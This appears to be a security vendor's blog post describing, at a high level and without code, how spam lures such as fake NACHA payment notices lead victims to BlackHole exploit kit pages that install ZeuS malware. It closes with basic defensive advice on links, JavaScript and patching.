A Refresher on Spam and Exploits

Lately, we have been seeing a renewed increase in volume of spam attacks that utilizes an exploit kit – specifically, the BlackHole exploit kit – to trigger a malicious payload. Specifically, we have seen this in the latest slew of Automated Clearing House (ACH) spam, and the more recent spam run related to Steve Jobs’ death.

In this post, we will reorient readers on the infection chain of such attacks to help us understand why the basic mitigation practices are still effective and helpful in protecting one’s self from today’s threats.

In a typical spam campaign that involves malware, cybercriminals lure users through social engineering into performing several actions before the intended payload gets executed. For example, a user needs to download, extract, and execute a supposedly “benign” file for a spam attack to succeed.

Spam campaigns using exploit kits, however, are a bit more dangerous since they only need to lure the user into clicking a malicious link and the rest of the infection will be able to take place.


Below is an example of this type of spam purporting to be coming from National Automated Clearing House Association (NACHA). NACHA manages the ACH network, which facilitates bulk payment transactions involving businesses, governments, as well as consumers. Users who are more likely to receive email from NACHA are those who conduct transactions related to payroll, government benefits, tax refunds, and others.

In the spam screenshot above, we can see that the link points to a dubious-looking domain that is not related to National Automated Clearing House Association (NACHA). A blank page is displayed when users click the link. This blank page is actually a gateway page that contains the following obfuscated JavaScript:


When decrypted, we can see that it is a script that attempts to embed an iframe pointing to another malicious site, which uses the BlackHole Exploit Kit:


Once the iframe is loaded, content is also loaded from the BlackHole Exploit Kit site which, again, contains a highly obfuscated script. Upon decoding the code, we can now see the actual code which searches for vulnerable software and uses the appropriate exploits.

The BlackHole Exploit Kit exploits vulnerabilities both in third-party applications like Adobe Acrobat, Adobe Flash, and Java, as well as in Windows components like Microsoft Data Access Components (MDAC) and Help and Support Center (HCP).


Successful exploitation executes a shellcode, which triggers downloading and executing malware. We have observed that these attacks have been used to spread ZeuS variants, although these may also be used to spread other malware families.

Multilayer Mitigation
As a reminder to users, here are some ways to prevent this kind of threat from getting into their systems:

• Be aware of social engineering attacks. A majority of online attacks today utilize social engineering before they can exhibit technical infection. By being wary of what you do online, infections can already be mitigated at the onset. Simple common sense like not entertaining unsolicited emails could go a long way in terms of your personal online security.
• Always check for malicious links. Always check where the URLs hyperlinks point to. It is also a good practice to copy and paste a URL to your browser address bar instead of clicking links directly. 

• Consider disabling JavaScript in your browser. As mentioned earlier, the gateway page and the BlackHole Exploit Kit page both used JavaScript. This is also the case for a lot of threats today that use the browser to execute a malicious payload. As such, it is a good idea to consider disabling JavaScript in your browser and only allow it to your trusted sites if necessary. 

• Always remember to patch. The BlackHole Exploit Kit utilizes exploits that affect old, unpatched versions of software. The persistence of such tools means that old exploits are still able to infect many users. No matter how inconvenient it may be, patching your software regularly is still an important mitigation process.

The state of the threat landscape and the overwhelming reliance of the general public on the Internet demands that users should have awareness of the kinds of threats found on the Web, as well as ways to protect themselves through it. In having knowledge of how attacks such as this one work, users can gain advantage of the attackers, and be able to stop a threat even before it gets into their system. A little self-education can ultimately make the whole Internet a better and safer place to be.